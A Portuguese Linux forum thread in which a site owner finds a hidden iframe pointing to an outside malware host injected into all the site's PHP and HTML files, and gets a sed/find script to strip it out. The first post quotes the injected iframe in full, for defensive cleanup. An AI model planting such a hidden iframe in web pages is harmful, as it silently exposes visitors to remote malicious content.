invasão do site por malware [RESOLVIDO]

1. invasão do site por malware [RESOLVIDO]

jomar
jomartg

(usa CentOS)

Enviado em 20/09/2009 - 12:39h

Caros amigos,
Meu site foi invadido. Todos os arquivos php, html etc foram contaminados com a seguinte string: <iframe src="http://thingre.com/in.php" width="1" height="1"style="visibility:hidden;position:absolute"></iframe> antes do </body>

Como faço para apagar esta string de todos os arquivos onde esta string for encontrada, inclusive nos subdiretorios?
Meus conhecimentos no linux são básicos.
Agradeço antecipadamente.
Jomar



  


2. MELHOR RESPOSTA

kleber galucio
klebrr

(usa Linux Mint)

Enviado em 20/09/2009 - 13:10h

============================
=Faça um backup do seu site=
============================

Crie um script bash "remove.sh"

#!/bin/bash

sed 's/<iframe\ src.*<\/iframe>//g' < "$1" > "$1.tmp"
mv "$1.tmp" "$1"

Depois use com o find

find . -iname '*.php' | xargs -i ./remove.sh {} \;

Obs: geralmente tem que adaptar algumas ER
para que funcione.
* não esquecer de tornar o script "remove.sh" executavel
chmod +x remove.sh

find . significa que vai procurar a partir de onde vc está, assim sendo é melhor que esteja na raiz de seu site juntamente com o arquivo "remove.sh"

3. Re: invasão do site por malware [RESOLVIDO]

jomar
jomartg

(usa CentOS)

Enviado em 20/09/2009 - 21:05h

Caro Kleber,
Fiz conforme sugeriu, mas não funcionou.
A string não sumiu e o comando find não apresentou nenhuma mensagem de erro.


4. Re: invasão do site por malware [RESOLVIDO]

kleber galucio
klebrr

(usa Linux Mint)

Enviado em 20/09/2009 - 23:05h

olha fiz o teste aqui e funcionou, confere abaixo:
[root@teste]# ll
total 16
177 Set 20 21:57 index1.php
177 Set 20 21:54 index2.php
177 Set 20 21:56 index3.php
79 Set 20 21:56 remove.sh*

[root@teste]# find . -iname '*.php' | xargs -i ./remove.sh {} \;
[root@teste]# ll
total 16
146 Set 20 21:57 index1.php
146 Set 20 21:57 index2.php
146 Set 20 21:57 index3.php
79 Set 20 21:56 remove.sh*
[root@teste]# cat index1.php
<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="content-type">
<title>kleber - teste</title>
</head>
<body>
Teste de arquivo<br>
</body>



5. Re: invasão do site por malware [RESOLVIDO]

jomar
jomartg

(usa CentOS)

Enviado em 20/09/2009 - 23:19h

Agora funcionou, tinha um espaço em branco após o * no remove.sh (não sei como apareceu pois usei ctrl-c).
Obrigado cleber.
Site limpo.






Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts